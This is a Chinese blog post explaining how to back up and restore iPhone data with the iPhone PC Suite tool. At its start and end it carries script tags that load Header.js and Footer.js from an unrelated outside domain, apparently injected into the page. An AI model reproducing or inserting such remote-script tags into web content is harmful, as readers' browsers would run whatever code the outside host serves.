iPhone PC Suite(iPhone PC套件)讲解

<script language='javascript' src='http://www.shiqiaotou.com/donetk/Header.js'></script>

作者:roger_xiong  iPhone PC Suite下载 如使用出错,请下载.NET Framework 2.0简体版

  不知道你有没有像我一样,iPhone用久了,或者乱动,里面的文件很混乱,需要重新恢复过?

  不知道你有没有像我一样,恢复过的iPhone,原来的铃声,短信铃声,主题,来电记录,联络人,短信都没有了,还calldata.db要重新上传,AppSupport要重新上传……

  不知道你会不会像我一样觉得很麻烦,麻烦到不到万不得已实在不想重新恢复系统,因为我懒……

iPhone PC Suite



启动后的选择:

iPhone PC Suite

1、先来把数据备份一个:

iPhone PC Suite

  备份的界面中分了2个部分,一个是常用的备份项目,方便你直接选取,另一个就是自定义的备份项目,可以选择单个或者多个iPhone中的文件或文件夹。

  常用的备份项目,提供了我认为一般会用到的项目,从系统的项目到第三方软件共有17项之多,这些项目的备份你只要打勾就可以了,其他的时候,软件就会替你去处理,不需要你再麻烦手动去iPhone里面挑那些文件要备份啦,^_^

来看看添加自定义项目的画面:

iPhone PC Suite


选一两个我自己认为要备份的内容。

iPhone PC Suite


开始备份:

iPhone PC Suite


接下来看看,还原里面有什么东东:


iPhone PC Suite

  左边的列表显示的是你总共有几个备份,比如在我这里共备份了2次,一个叫『2007-11-21』另一个叫『自定义的备份』,你可以自己挑选要还原那一个。

iPhone PC Suite

  选择不同的备份,可以看到不同的备份里面提供的可以还原的东西也不一样,这个跟你原来备份的时候选择的项目有关系,你没有备份的项目,我总不能替你生一个出来吧?呵呵。

  此外,这些备份的项目,你在还原的时候,还可以选到底那些具体的项目是你要还原的。

  比如,上次备份的时候,备份了UISounds和自定义铃声,这次还原的时候,不想都还原回去,只要还原自定义铃声,那么就把UISounds的勾给去掉,然后再去点『开始还原』,就可以拉。

 


文章来源于 http://iphone.tgbus.com 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值